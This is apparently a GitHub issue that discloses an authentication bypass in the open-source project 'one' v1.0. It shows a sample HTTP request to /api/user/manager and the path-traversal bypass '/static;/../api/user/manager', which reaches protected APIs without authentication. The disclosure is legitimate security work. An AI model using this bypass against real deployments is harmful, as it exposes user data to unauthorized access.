There is an Incorrect Access Control vulnerability in one

[Suggested description]
one was found to have an Incorrect Access Control vulnerability up to v1.0, resulting in information leakage.

[Vulnerability Type]
Incorrect access control

[Vendor of Product]
https://github.com/lcw2004/one

[Affected Product Code Base]
all version (v1.0)

[Affected Component]
sensitive APIs that require authentication

[Attack Type]
Remote

[Vulnerability details]
Directly send the payload below to the API `/api/user/manager` will fail because of the authentication. 
```
GET /api/user/manager HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Host: 127.0.0.1:8080
Connection: keep-alive
Cookie: JSESSIONID=915CAEC0CF1BCEC8A316D41DEAFC8969
Referer: http://127.0.0.1:8080/api/user/manager
```

<img width="737" alt="Image" src="https://github.com/user-attachments/assets/f8e8d400-b5f9-4cb2-94e4-7c5cc4ee5295" />

However, send the payload below to the API `/static;/../api/user/manager` will bypass the authentication. 

<img width="1084" alt="Image" src="https://github.com/user-attachments/assets/cb838937-ef31-413a-a1e4-6f49332fda76" />


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

There is an Incorrect Access Control vulnerability in one #44

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

There is an Incorrect Access Control vulnerability in one #44

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions